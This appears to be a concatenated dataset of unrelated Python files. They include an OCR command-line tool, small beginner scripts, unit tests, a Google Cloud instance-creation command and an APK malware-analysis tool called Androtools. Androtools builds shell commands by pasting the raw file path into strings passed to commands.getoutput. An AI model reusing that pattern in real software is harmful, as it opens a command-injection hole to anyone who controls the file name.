model_dict['default'] = value[0]
return model_dict
try:
for m in value:
k, v = m.split(':')
if v == 'ignore':
model_dict['ignore'].append(k) # type: ignore
else:
model_dict[k] = os.path.expanduser(v)
except Exception as e:
raise click.BadParameter('Mappings must be in format script:model')
return model_dict
@cli.command('ocr')
@click.pass_context
@click.option('-m', '--model', default=DEFAULT_MODEL, multiple=True,
show_default=True, callback=_validate_mm,
help='Path to an recognition model or mapping of the form '
'$script1:$model1. Add multiple mappings to run multi-model '
'recognition based on detected scripts. Use the default keyword '
'for adding a catch-all model. Recognition on scripts can be '
'ignored with the model value ignore.')
@click.option('-p', '--pad', show_default=True, type=click.INT, default=16, help='Left and right '
'padding around lines')
@click.option('-n', '--reorder/--no-reorder', show_default=True, default=True,
help='Reorder code points to logical order')
@click.option('-s', '--no-segmentation', default=False, show_default=True, is_flag=True,
help='Enables non-segmentation mode treating each input image as a whole line.')
@click.option('-h', '--hocr', 'serializer', help='Switch between hOCR, '
'ALTO, and plain text output', flag_value='hocr')
@click.option('-a', '--alto', 'serializer', flag_value='alto')
@click.option('-y', '--abbyy', 'serializer', flag_value='abbyyxml')
@click.option('-t', '--text', 'serializer', flag_value='text', default=True,
show_default=True)
@click.option('-d', '--text-direction', default='horizontal-tb',
show_default=True,
type=click.Choice(['horizontal-tb', 'vertical-lr', 'vertical-rl']),
help='Sets principal text direction in serialization output')
@click.option('-l', '--lines', type=click.Path(exists=True), show_default=True,
help='JSON file containing line coordinates')
@click.option('--threads', default=1, show_default=True,
help='Number of threads to use for OpenMP parallelization.')
def ocr(ctx, model, pad, reorder, no_segmentation, serializer, text_direction, lines, threads):
"""
Recognizes text in line images.
"""
from kraken.lib import models
# first we try to find the model in the absolue path, then ~/.kraken, then
# LEGACY_MODEL_DIR
nm = {} # type: Dict[str, models.TorchSeqRecognizer]
ign_scripts = model.pop('ignore')
for k, v in model.items():
search = [v,
os.path.join(click.get_app_dir(APP_NAME), v),
os.path.join(LEGACY_MODEL_DIR, v)]
location = None
for loc in search:
if os.path.isfile(loc):
location = loc
break
if not location:
raise click.BadParameter('No model for {} found'.format(k))
message('Loading RNN {}\t'.format(k), nl=False)
try:
rnn = models.load_any(location, device=ctx.meta['device'])
nm[k] = rnn
except Exception:
message('\u2717', fg='red')
raise
ctx.exit(1)
message('\u2713', fg='green')
if 'default' in nm:
from collections import defaultdict
nn = defaultdict(lambda: nm['default']) # type: Dict[str, models.TorchSeqRecognizer]
nn.update(nm)
nm = nn
# thread count is global so setting it once is sufficient
nn[k].nn.set_num_threads(threads)
# set output mode
ctx.meta['mode'] = serializer
ctx.meta['text_direction'] = text_direction
return partial(recognizer,
model=nm,
pad=pad,
no_segmentation=no_segmentation,
bidi_reordering=reorder,
script_ignore=ign_scripts,
lines=lines)
@cli.command('show')
@click.pass_context
@click.argument('model_id')
def show(ctx, model_id):
"""
Retrieves model metadata from the repository.
"""
import unicodedata
from kraken import repo
from kraken.lib.util import make_printable, is_printable
desc = repo.get_description(model_id)
chars = []
combining = []
for char in sorted(desc['graphemes']):
if not is_printable(char):
combining.append(make_printable(char))
else:
chars.append(char)
message('name: {}\n\n{}\n\n{}\nscripts: {}\nalphabet: {} {}\naccuracy: {:.2f}%\nlicense: {}\nauthor(s): {}\ndate: {}'.format(model_id,
desc['summary'],
desc['description'],
' '.join(desc['script']),
''.join(chars),
', '.join(combining),
desc['accuracy'],
desc['license']['id'],
'; '.join(x['name'] for x in desc['creators']),
desc['publication_date']))
ctx.exit(0)
@cli.command('list')
@click.pass_context
def list_models(ctx):
"""
Lists models in the repository.
"""
from kraken import repo
message('Retrieving model list ', nl=False)
model_list = repo.get_listing(partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h\n', nl=False)
for id, metadata in model_list.items():
message('{} ({}) - {}'.format(id, ', '.join(metadata['type']), metadata['summary']))
ctx.exit(0)
@cli.command('get')
@click.pass_context
@click.argument('model_id')
def get(ctx, model_id):
"""
Retrieves a model from the repository.
"""
from kraken import repo
try:
os.makedirs(click.get_app_dir(APP_NAME))
except OSError:
pass
message('Retrieving model ', nl=False)
filename = repo.get_model(model_id, click.get_app_dir(APP_NAME),
partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h')
message('Model name: {}'.format(filename))
ctx.exit(0)
if __name__ == '__main__':
cli()
|
nilq/baby-python
|
python
|
hello = 'hello world'
print(hello)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
nota1 = float(input('Digite a primeira nota: '))
nota2 = float(input('Digite a segunda nota: '))
media = (nota1 + nota2) / 2
print('A média foi de {:.2f}!'.format(media))
|
nilq/baby-python
|
python
|
import unittest
import sys
undertest = __import__(sys.argv[-1].split(".py")[0])
maioridade_penal = getattr(undertest, 'maioridade_penal', None)
class PublicTests(unittest.TestCase):
def test_basico_1(self):
assert maioridade_penal("Jansen Italo Ana","14 21 60") == "Italo Ana"
if __name__ == '__main__':
loader = unittest.TestLoader()
runner = unittest.TextTestRunner()
runner.run(loader.loadTestsFromModule(sys.modules[__name__]))
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
import json
def stringToInt(origin_string):
result = 0
temp_string = origin_string.strip()
for c in temp_string:
if c >= '0' and c <= '9':
result = result * 10 + (ord(c) - ord('0'))
else:
return -1
return result
def getString(hint, default_value_hint, default_value):
temp_input = input("%s(%s): " % (hint, default_value_hint))
if temp_input != "":
return temp_input
else:
return default_value
def getNumber(hint, default_value_hint, default_value):
temp_input = input("%s(%s): " % (hint, default_value_hint))
if temp_input == "" or stringToInt(temp_input) < 0:
return default_value
else:
return stringToInt(temp_input)
def createNewSetting(a):
new_setting = dict(a["settings"][0])
new_setting["translator"]["url"] = getString(
"What server url would you like to use?",
new_setting["translator"]["url"],
new_setting["translator"]["url"]
)
new_setting["translator"]["delay_milliseconds"] = getNumber(
"Wait time between requests. It aims to limit the request rate for the access to translation server via this api may be canceled if the rate is too high.",
"700",
700
)
new_setting["IO"]["input_file"]["path"] = getString(
"Read from which file?",
"DESIDE AT RUNTIME",
None
)
new_setting["IO"]["input_file"]["encode"] = getString(
"Encodeing of input file?",
"utf-8",
"utf-8"
)
new_setting["IO"]["input_file"]["language"] = getString(
"Language of input file.",
"auto",
"auto"
)
new_setting["IO"]["output_file"]["path"] = getString(
"Write to which file?",
"ADD .out AFTER INPUT PATH",
None
)
new_setting["IO"]["output_file"]["encode"] = getString(
"Encodeing of output file?",
"utf-8",
"utf-8"
)
temp = input("Now please tell me the route of translation language, one each line. End with a empty line?(ja zh-cn):\n")
temp_list = list()
while True:
if temp == "":
break
temp_list.append(temp)
temp = input()
if len(temp_list) >= 2:
new_setting["translation"]["steps"] = temp_list
new_setting["translation"]["rounds"] = getNumber(
"Translate for how many rounds. Set to 0 to translate until the result no longer changes.",
"0",
0
)
new_setting["name"] = input("Finally, give this setting a name: ")
a["settings"].append(new_setting)
temp = input("Set this setting default?[Y]/n: ")
if temp == "" or temp == "y" or temp == "Y":
a["default"] = len(a["settings"]) - 1
try:
file = open("settings.json", "w")
if file.writable == False:
print("Oops, can't save setting! Terminate......")
exit()
file.write(json.dumps(a, indent="\t"))
finally:
if file:
file.close()
def getSetting():
try:
file = open("settings.json", "r")
if file.readable() == False:
print("Can't read setting file. Terminate.")
exit()
a = json.loads(file.read())
finally:
if file:
file.close()
current_index = 0
for setting in a["settings"]:
print("%d. %s%s" % (current_index, setting["name"], "(DEFAULT)" if(current_index == a["default"]) else ""))
current_index += 1
print("%d. CREATE A NEW SETTING" % current_index)
selection = input("Please select a setting by its index, or <ENTER> for default: ")
if selection == "":
selected_setting = a["default"]
else:
selected_setting = stringToInt(selection)
if selected_setting > current_index or selected_setting < 0:
print("Invalid index. Use default.")
selected_setting = a["default"]
elif selected_setting == current_index:
createNewSetting(a)
return a["settings"][selected_setting]
|
nilq/baby-python
|
python
|
import sys
import zipfile
import shutil
import commands
import os
import hashlib
import re
import traceback
import json
from lib.dexparser import Dexparser
from lib.CreateReport import HTMLReport
from lib.Certification import CERTParser
import lib.dynamic as dynamic
dexList = [] #dexfile list
#program usage
def usage():
print "androtools : no file specified"
print "./androtools <APK_FILE_PATH> <HTML_OUTPUT_FILENAME>"
#program information
def about(apkfile):
print "Androtools - Android APK Static & Dynamic Analyzer"
print "Developed by Kim Namjun (Sejong University, Department of Information Security)"
print "Target APK Path : %s" %apkfile
#filehash extractor
def filehash(apkfile, mode):
if mode == "md5":
with open(apkfile, 'rb') as f:
m = hashlib.md5()
while True:
data = f.read()
if not data:
break
m.update(data)
return m.hexdigest()
elif mode == "sha1":
with open(apkfile, 'rb') as f:
m = hashlib.sha1()
while True:
data = f.read()
if not data:
break
m.update(data)
return m.hexdigest()
elif mode == "sha256":
with open(apkfile, 'rb') as f:
m = hashlib.sha256()
while True:
data = f.read()
if not data:
break
m.update(data)
return m.hexdigest()
else:
return ""
#delete temp file directory
def delTemp():
commands.getoutput("rm -rf temp")
#check target file that this is vaild apk file
def is_android(zfile):
for fname in zfile.namelist():
if "AndroidManifest.xml" in fname:
return True
elif "resources.arsc" in fname:
return True
else:
pass
return False
#logging error to error_log.txt
def logError(error_msg):
f = open('error_log.txt', 'a+')
f.write('[*] ' + error_msg + '\n')
f.close()
#extract dex file to temp file
def extractDEX(zfile):
global dexList
for fname in zfile.namelist():
if fname[-4:] == ".dex": #if file extension is dex
zfile.extract(fname, "temp")
dexpath = os.path.join("temp", fname)
dexhash = filehash(dexpath, "md5")
shutil.move(dexpath, os.path.join("temp", dexhash + ".dex"))
dexList.append(dexhash + ".dex")
#file resource searching
def fileResource(zfile):
print "[*] Extracting File Resource Data..."
extension = {'.apk' : 0, '.png' : 0, '.jpg' : 0, '.xml' : 0, '.mp3' : 0, '.txt' : 0, '.ini' : 0, '.so' : 0}
keylist = extension.keys()
soEnvironment = []
for fname in zfile.namelist():
if fname[-4:] in keylist:
extension[fname[-4:]] += 1
if fname[:4] == "lib/":
soEnvironment.append(fname.split('/')[1])
extension[fname[-3:]] += 1
statistics = []
for ext in extension.keys():
if extension[ext] == 0:
pass
else:
tempArr = []
tempArr.append(ext)
tempArr.append(str(extension[ext]))
statistics.append(tempArr)
return statistics
#extract string from xml
def extractString(report, apkfile):
print "[*] Extracting All XML String..."
stringCmd = "./lib/aapt dump strings %s" %apkfile
strResult = commands.getoutput(stringCmd).split('\n')
extractedStr = []
for xmlstring in strResult:
if "res/" in xmlstring:
pass
else:
try:
if len(xmlstring.split(':')[1]) == 0:
pass
else:
extractedStr.append(xmlstring.split(': ')[1])
except:
extractedStr.append(xmlstring)
report.stringinfo(extractedStr)
#get method information from dex
def methodAnalysis(report, string, typeid, method):
methodArr = []
for i in range(len(method)):
(class_idx, proto_idx, name_idx) = method[i]
class_str = string[typeid[class_idx]]
name_str = string[name_idx]
data = '%s.%s()' % (class_str, name_str)
methodArr.append(data)
report.dexmethodinfo(methodArr)
#get dex class filename (.java)
def classExtract(report, string):
classArray = []
for dexstr in string:
if ".java" in dexstr:
classArray.append(dexstr)
report.dexclassinfo(classArray)
#get dex adler32 checksum
def checksum(dexmodule):
return dexmodule.checksum()
#check similarity using ssdeep
def simcheck(apkfile, fuzzyhash):
print "[*] Checking Similarity..."
simdata = []
match = []
if os.path.exists('sim.txt') == False: #if sim.txt not found?
print "[*] Creating similarity storage DB.."
f = open('sim.txt', 'a+')
f.write('ssdeep,1.1--blocksize:hash:hash,filename\n' + fuzzyhash + '\n')
else:
searchQuery = commands.getoutput("ssdeep -m sim.txt " + apkfile).split('\n')
#print searchQuery
for query in searchQuery:
tempArr = []
try:
persent = query.split(':')[1].split(' ')[1].replace(')', '%)')
filename = os.path.basename(query.split(':')[1].split(' ')[0])
tempArr.append(filename)
tempArr.append(persent)
match.append(tempArr)
except:
pass
f = open('sim.txt', 'a+')
f.write(fuzzyhash + '\n')
return match
#find suspicious string in dex and replace if highlight
def findSuspicious(report, stringlist):
dexstrlist = []
for i in range(len(stringlist)):
email = re.findall(r'([\w.-]+)@([\w.-]+)', stringlist[i])
url = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', stringlist[i])
ip = re.findall(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', stringlist[i])
if email:
dexstrlist.append(str(email[0][0] + "@" + email[0][1]))
if url:
dexstrlist.append(str(url[0]))
if ip:
dexstrlist.append(str(ip[0]))
report.dexstringinfo(dexstrlist)
#parse information from DEX list
def parseDEX(report):
global dexList
report.dexinfoHeader()
for dexfile in dexList:
parse = Dexparser(os.path.join("temp", dexfile))
string = parse.string_list()
typeid = parse.typeid_list()
method = parse.method_list()
adler32 = checksum(parse)
report.dexBasicinfo(dexfile, adler32)
findSuspicious(report, string)
#classExtract(report, string)
#methodAnalysis(report, string, typeid, method)
#get permission information
def permission(report, apkfile):
print "[*] Extracting Permission Data..."
permlist = []
permcmd = "./lib/aapt dump permissions %s" %apkfile
getperm = commands.getoutput(permcmd).split('\n')
for perm in getperm:
if "uses-permission" in perm:
permlist.append(perm.split(': ')[1])
report.writePerminfo(permlist)
def nativeparser(solist, report):
filterList = []
for sofile in solist:
with open(os.path.join("temp", sofile[1] + ".so"), 'rb') as f:
data = f.read()
email = re.findall(r'([\w.-]+)@([\w.-]+)', data)
url = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', data)
ip = re.findall(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', data)
if email:
if str(email[0][0] + "@" + email[0][1]) not in filterList:
filterList.append(str(email[0][0] + "@" + email[0][1]))
if url:
if str(url[0]) not in filterList:
filterList.append(str(url[0]))
if ip:
if str(ip[0]) not in filterList:
filterList.append(str(ip[0]))
report.nativeStringinfo(filterList)
#native file information
def nativefile(zfile, report):
print "[*] Extracting Native File Data..."
solist = []
for fname in zfile.namelist():
if fname[-3:] == ".so":
tempArr = []
sofile = os.path.basename(fname)
source = zfile.open(fname)
target = file(os.path.join("temp", sofile), "wb")
with source, target:
shutil.copyfileobj(source, target)
sohash = filehash(os.path.join("temp", sofile), "sha1")
shutil.move(os.path.join("temp", sofile), os.path.join("temp", sohash + ".so"))
tempArr.append(fname)
tempArr.append(sohash)
solist.append(tempArr)
report.nativeFileinfo(solist)
nativeparser(solist, report)
#get apk file basic information
def getbasic(apkfile, report):
print "[*] Extracting Basic APK File Data..."
filename = os.path.basename(apkfile)
md5hash = filehash(apkfile, "md5")
sha1hash = filehash(apkfile, "sha1")
sha256hash = filehash(apkfile, "sha256")
filesize = str(os.path.getsize(apkfile) / 1024)
try:
fuzzy = commands.getoutput("ssdeep -s " + apkfile).split('\n')[1]
except:
print "[*] Fuzzyhash Command not found. Please <brew install ssdeep> to install"
fuzzy = ""
report.writeBaseinfo(filename, md5hash, sha1hash, sha256hash, fuzzy.split(',')[0], filesize)
return fuzzy
#get Certification information
def getCert(zfile, report):
print "[*] Extracting Certification Data..."
certlist = []
certdata = []
for fname in zfile.namelist():
if fname[-4:] == ".RSA":
certfile = os.path.basename(fname)
source = zfile.open(fname)
target = file(os.path.join("temp", certfile), "wb")
with source, target:
shutil.copyfileobj(source, target)
certlist.append(certfile)
for cert in certlist:
tempArr = []
c = CERTParser(os.path.join("temp", cert))
tempArr.append(cert)
tempArr.append(c.fingerprint())
tempArr.append(c.issuer())
tempArr.append(c.starttime())
certdata.append(tempArr)
report.writeCERTinfo(certdata)
#get AndroidManifest.xml information
def getManifest(apkfile, report):
print "[*] Extracting AndroidManifest Data..."
infocmd = "./lib/aapt dump badging %s" %apkfile
getinfo = commands.getoutput(infocmd).split('\n')
apiver = ""
cputype = ""
entry = ""
targetver = ""
appname = ""
packname = ""
entry = ""
for info in getinfo:
data = info.split(':')
if data[0] == "sdkVersion":
apiver = data[1].replace('\'', '')
if data[0] == "targetSdkVersion":
targetver = data[1].replace('\'', '')
if data[0] == "application-label":
try:
appname = data[1].replace('\'', '')
except:
appname = data[1]
if data[0] == "package":
packname = data[1].split('\'')[1]
if data[0] == "launchable-activity":
entry = data[1].split('\'')[1]
if data[0] == "native-code":
for cpu in data[1].split('\''):
cputype += cpu + " "
report.writeManifestinfo(apiver, cputype, targetver, appname, packname, entry)
return [packname, entry]
#dynamic analysis
def dynamicAnalysis(report, apkfile, packname, entry):
print "[*] Dynamic Analysis start!"
anal_result = dynamic.main(apkfile, packname, entry)
result = json.loads(anal_result)
try:
report.datasectioninfo(result['filetag']['startCreate'], result['filetag']['endCreate'])
except:
pass
try:
report.logcatinfo(result['logtag'])
except:
pass
try:
report.packetinfo(result['packettag']['packet'], result['timeline']['ipList'])
except:
pass
print "[*] Dynamic Analysis end!"
#program entry point
def main(apkfile, output):
try:
about(apkfile) #program information
isVaild = zipfile.is_zipfile(apkfile) #check vaild zip container
if isVaild:
zfile = zipfile.ZipFile(apkfile)
isAndroid = is_android(zfile) #check vaild android apk file
if isAndroid:
print "[*] Analysis start!"
#setting HTML Report
report = HTMLReport(output)
report.header()
report.style()
report.bodystart()
fuzzy = getbasic(apkfile, report)
extractDEX(zfile) #extract dex file
filetype = fileResource(zfile) #analyze file resources
simresult = simcheck(apkfile, fuzzy) #similarity check
report.writeFileinfo(filetype, simresult)
xmlinfo = getManifest(apkfile, report)
permission(report, apkfile)
getCert(zfile, report)
parseDEX(report)
extractString(report, apkfile)
nativefile(zfile, report)
dynamicAnalysis(report, apkfile, xmlinfo[0], xmlinfo[1])
report.endbody()
del report
else:
print "[*] Sorry, We can\'t analyze this file"
else:
print "[*] Sorry, We can\'t analyze this file"
delTemp()
print "[*] Analysis complete!"
except Exception, e:
logError(str(traceback.format_exc()))
print "[*] Androtools Exception - Error logged!"
if __name__ == '__main__':
try:
main(sys.argv[1], sys.argv[2])
except:
usage()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import setuptools
setuptools.setup(
author='Bryan Stitt',
author_email='bryan@stitthappens.com',
description='Mark shows unwatched on a schedule.',
long_description=__doc__,
entry_points={
'console_scripts': [
'plex-schedule = plex_schedule.cli:cli',
],
},
install_requires=[
'click',
'plexapi',
'sqlalchemy',
'PyYAML',
], # keep this in sync with requirements.in
name='plex_schedule',
packages=setuptools.find_packages(),
version='0.0.1.dev0',
)
|
nilq/baby-python
|
python
|
"""A class using all the slightly different ways a function could be defined
and called. Used for testing appmap instrumentation.
"""
# pylint: disable=missing-function-docstring
from functools import lru_cache, wraps
import time
import appmap
class ClassMethodMixin:
@classmethod
def class_method(cls):
return 'ClassMethodMixin#class_method, cls %s' % (cls.__name__)
class Super:
def instance_method(self):
return self.method_not_called_directly()
def method_not_called_directly(self):
return 'Super#instance_method'
def wrap_fn(fn):
@wraps(fn)
def wrapped_fn(*args, **kwargs):
try:
print('calling %s' % (fn.__name__))
return fn(*args, **kwargs)
finally:
print('called %s' % (fn.__name__))
return wrapped_fn
class ExampleClass(Super, ClassMethodMixin):
def __repr__(self):
return 'ExampleClass and %s' % (self.another_method())
# Include some lines so the line numbers in the expected appmap
# don't change:
# <blank>
def another_method(self):
return "ExampleClass#another_method"
def test_exception(self):
raise Exception('test exception')
what_time_is_it = time.gmtime
@appmap.labels('super', 'important')
def labeled_method(self):
return 'super important'
@staticmethod
@wrap_fn
def wrapped_static_method():
return 'wrapped_static_method'
@classmethod
@wrap_fn
def wrapped_class_method(cls):
return 'wrapped_class_method'
@wrap_fn
def wrapped_instance_method(self):
return 'wrapped_instance_method'
@staticmethod
@lru_cache(maxsize=1)
def static_cached(value):
return value + 1
def instance_with_param(self, p):
return p
@staticmethod
def static_method():
import yaml, io # Formatting is funky to minimize changes to expected appmap
yaml.Dumper(io.StringIO()).open(); return 'ExampleClass.static_method\n...\n'
@staticmethod
def call_yaml():
return ExampleClass.dump_yaml('ExampleClass.call_yaml')
@staticmethod
def dump_yaml(data):
import yaml
# Call twice, to make sure both show up in the recording
yaml.dump(data)
yaml.dump(data)
def with_docstring(self):
"""
docstrings can have
multiple lines
"""
return True
# comments can have
# multiple lines
def with_comment(self):
return True
|
nilq/baby-python
|
python
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for creating instances."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute import csek_utils
from googlecloudsdk.api_lib.compute import image_utils
from googlecloudsdk.api_lib.compute import instance_utils
from googlecloudsdk.api_lib.compute import metadata_utils
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.api_lib.compute import zone_utils
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags
from googlecloudsdk.command_lib.compute.instances import flags as instances_flags
DETAILED_HELP = {
'DESCRIPTION': """\
*{command}* facilitates the creation of Google Compute Engine
virtual machines. For example, running:
$ {command} example-instance-1 example-instance-2 example-instance-3 --zone us-central1-a
will create three instances called `example-instance-1`,
`example-instance-2`, and `example-instance-3` in the
`us-central1-a` zone.
When an instance is in RUNNING state and the system begins to boot,
the instance creation is considered finished, and the command returns
with a list of new virtual machines. Note that you usually cannot log
into a new instance until it finishes booting. Check the progress of an
instance using `gcloud compute instances get-serial-port-output`.
For more examples, refer to the *EXAMPLES* section below.
""",
'EXAMPLES': """\
To create an instance with the latest ``Red Hat Enterprise Linux
6'' image available, run:
$ {command} example-instance --image rhel-6 --zone us-central1-a
""",
}
def _CommonArgs(parser):
"""Register parser args common to all tracks."""
metadata_utils.AddMetadataArgs(parser)
instances_flags.AddDiskArgs(parser)
instances_flags.AddLocalSsdArgs(parser)
instances_flags.AddCanIpForwardArgs(parser)
instances_flags.AddAddressArgs(parser, instances=True)
instances_flags.AddMachineTypeArgs(parser)
instances_flags.AddMaintenancePolicyArgs(parser)
instances_flags.AddNoRestartOnFailureArgs(parser)
instances_flags.AddPreemptibleVmArgs(parser)
instances_flags.AddScopeArgs(parser)
instances_flags.AddTagsArgs(parser)
instances_flags.AddCustomMachineTypeArgs(parser)
instances_flags.AddNetworkArgs(parser)
instances_flags.AddPrivateNetworkIpArgs(parser)
instances_flags.AddImageArgs(parser)
parser.add_argument(
'--description',
help='Specifies a textual description of the instances.')
parser.add_argument(
'names',
metavar='NAME',
nargs='+',
help='The names of the instances to create.')
flags.AddZoneFlag(
parser,
resource_type='instances',
operation_type='create')
csek_utils.AddCsekKeyArgs(parser)
class Create(base_classes.BaseAsyncCreator,
image_utils.ImageExpander,
zone_utils.ZoneResourceFetcher):
"""Create Google Compute Engine virtual machine instances."""
@staticmethod
def Args(parser):
_CommonArgs(parser)
@property
def service(self):
return self.compute.instances
@property
def method(self):
return 'Insert'
@property
def resource_type(self):
return 'instances'
def CreateRequests(self, args):
instances_flags.ValidateDiskFlags(args)
instances_flags.ValidateLocalSsdFlags(args)
# This feature is only exposed in alpha/beta
allow_rsa_encrypted = self.ReleaseTrack() in [base.ReleaseTrack.ALPHA,
base.ReleaseTrack.BETA]
self.csek_keys = csek_utils.CsekKeyStore.FromArgs(args, allow_rsa_encrypted)
scheduling = instance_utils.CreateSchedulingMessage(
messages=self.messages,
maintenance_policy=args.maintenance_policy,
preemptible=args.preemptible,
restart_on_failure=args.restart_on_failure)
service_accounts = instance_utils.CreateServiceAccountMessages(
messages=self.messages,
scopes=([] if args.no_scopes else args.scopes))
if args.tags:
tags = self.messages.Tags(items=args.tags)
else:
tags = None
metadata = metadata_utils.ConstructMetadataMessage(
self.messages,
metadata=args.metadata,
metadata_from_file=args.metadata_from_file)
# If the user already provided an initial Windows password and
# username through metadata, then there is no need to check
# whether the image or the boot disk is Windows.
boot_disk_size_gb = utils.BytesToGb(args.boot_disk_size)
utils.WarnIfDiskSizeIsTooSmall(boot_disk_size_gb, args.boot_disk_type)
instance_refs = self.CreateZonalReferences(args.names, args.zone)
# Check if the zone is deprecated or has maintenance coming.
self.WarnForZonalCreation(instance_refs)
network_interface = instance_utils.CreateNetworkInterfaceMessage(
scope_prompter=self,
compute_client=self.compute_client,
network=args.network,
subnet=args.subnet,
private_network_ip=args.private_network_ip,
no_address=args.no_address,
address=args.address,
instance_refs=instance_refs)
machine_type_uris = instance_utils.CreateMachineTypeUris(
scope_prompter=self,
compute_client=self.compute_client,
project=self.project,
machine_type=args.machine_type,
custom_cpu=args.custom_cpu,
custom_memory=args.custom_memory,
instance_refs=instance_refs)
create_boot_disk = not instance_utils.UseExistingBootDisk(args.disk or [])
if create_boot_disk:
image_uri, _ = self.ExpandImageFlag(args, return_image_resource=False)
else:
image_uri = None
# A list of lists where the element at index i contains a list of
# disk messages that should be set for the instance at index i.
disks_messages = []
# A mapping of zone to boot disk references for all existing boot
# disks that are being attached.
# TODO(user): Simplify this once resources.Resource becomes
# hashable.
existing_boot_disks = {}
for instance_ref in instance_refs:
persistent_disks, boot_disk_ref = (
instance_utils.CreatePersistentAttachedDiskMessages(
self, self.compute_client, self.csek_keys, args.disk or [],
instance_ref))
local_ssds = [
instance_utils.CreateLocalSsdMessage(
self, x.get('device-name'), x.get('interface'), instance_ref.zone)
for x in args.local_ssd or []]
if create_boot_disk:
boot_disk = instance_utils.CreateDefaultBootAttachedDiskMessage(
self, self.compute_client, self.resources,
disk_type=args.boot_disk_type,
disk_device_name=args.boot_disk_device_name,
disk_auto_delete=args.boot_disk_auto_delete,
disk_size_gb=boot_disk_size_gb,
require_csek_key_create=(
args.require_csek_key_create if self.csek_keys else None),
image_uri=image_uri,
instance_ref=instance_ref,
csek_keys=self.csek_keys)
persistent_disks = [boot_disk] + persistent_disks
else:
existing_boot_disks[boot_disk_ref.zone] = boot_disk_ref
disks_messages.append(persistent_disks + local_ssds)
requests = []
for instance_ref, machine_type_uri, disks in zip(
instance_refs, machine_type_uris, disks_messages):
requests.append(self.messages.ComputeInstancesInsertRequest(
instance=self.messages.Instance(
canIpForward=args.can_ip_forward,
disks=disks,
description=args.description,
machineType=machine_type_uri,
metadata=metadata,
name=instance_ref.Name(),
networkInterfaces=[network_interface],
serviceAccounts=service_accounts,
scheduling=scheduling,
tags=tags,
),
project=self.project,
zone=instance_ref.zone))
return requests
Create.detailed_help = DETAILED_HELP
|
nilq/baby-python
|
python
|
from unittest import TestCase
from gui_components import parser
from math import tan
class ParserTestCase(TestCase):
def test_ctan(self):
self.assertEqual(parser.ctan(0.5), 1 / tan(0.5))
def test__check_res(self):
self.assertEqual(parser._check_res('2*x+3', 1), (True, 5))
self.assertEqual(parser._check_res('2*x+vasiles(2)+3', 1), (False, 0))
def test_get_integral_inside_expression(self):
self.assertEqual(parser.get_integral_inside_expression('integrala(2+x)'), '2+x')
self.assertEqual(parser.get_integral_inside_expression('5*x**2'), '')
def test_check_expression_validity(self):
self.assertEqual(parser.check_expression_validity(''), False)
self.assertEqual(parser.check_expression_validity('integrala(2+x)'), True)
self.assertEqual(parser.check_expression_validity('2+x'), True)
self.assertEqual(parser.check_expression_validity('integrala('), False)
self.assertEqual(parser.check_expression_validity('integrala22'), False)
self.assertEqual(parser.check_expression_validity('integrala(22+5+x)'), True)
def test_expr_to_lamda(self):
currrent_lambda = lambda x: x * 2
parser_lambda = parser.expr_to_lamda('x*2')
self.assertEqual(currrent_lambda(2), parser_lambda(2))
def test_check_expression_is_number(self):
self.assertTrue(parser.check_expression_is_number('2.5'))
self.assertFalse(parser.check_expression_is_number('vasile'))
|
nilq/baby-python
|
python
|
import random
whi1 = True
while whi1 is True:
try:
print("Selamat Datang Di Game Batu, Gunting, Kertas!")
pilihanAwal = int(input("Apakah Kau Ingin Langsung Bermain?\n1. Mulai Permainan\n2. Tentang Game\n3. Keluar\nPilihan: "))
whi2 = True
while whi2 is True:
if pilihanAwal == 1:
print("=" * 100)
def fungsibgk(pilihan):
komputer = random.choice(["Batu", "Gunting", "Kertas"])
if pilihan == 1:
print("Anda Memilih Batu")
print("Komputer Memilih", komputer)
if komputer == "Batu":
print("Seimbang")
elif komputer == "Gunting":
print("Kau Menang")
elif komputer == "Kertas":
print("Kau Kalah")
elif pilihan == 2:
print("Anda Memilih Gunting")
print("Komputer Memilih", komputer)
if komputer == "Gunting":
print("Seimbang")
elif komputer == "Kertas":
print("Kau Menang")
elif komputer == "Batu":
print("Kau Kalah")
elif pilihan == 3:
print("Anda Memilih Kertas")
print("Komputer Memilih", komputer)
if komputer == "Kertas":
print("Seimbang")
elif komputer == "Batu":
print("Kau Menang")
elif komputer == "Gunting":
print("Kau Kalah")
else:
print("Maaf, Pilihan Anda Tidak Ada Dalam Daftar")
pilihan = int(input("Masukkan Pilihan Anda: \n1. Batu\n2. Gunting\n3. Kertas\nPilihan: "))
print("=" * 100)
fungsibgk(pilihan)
elif pilihanAwal == 2:
print("=" * 100)
print("Created By Aswassaw227\nBuild In Python 3.6")
print("=" * 100)
break
elif pilihanAwal == 3:
print("=" * 100)
print("Terima Kasih Karena Telah Bermain, Semoga Harimu Menyenangkan")
print("=" * 100)
exit()
else:
print("=" * 100)
print("Maaf, Pilihan Anda Tidak Ada Dalam Daftar")
print("=" * 100)
break
except Exception as err:
print("=" * 100)
print(err)
print("=" * 100)
|
nilq/baby-python
|
python
|
# Generated by Django 2.0.13 on 2020-10-10 16:05
import ddcz.models.magic
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ddcz', '0024_skills_name'),
]
operations = [
migrations.AlterField(
model_name='commonarticle',
name='zdrojmail',
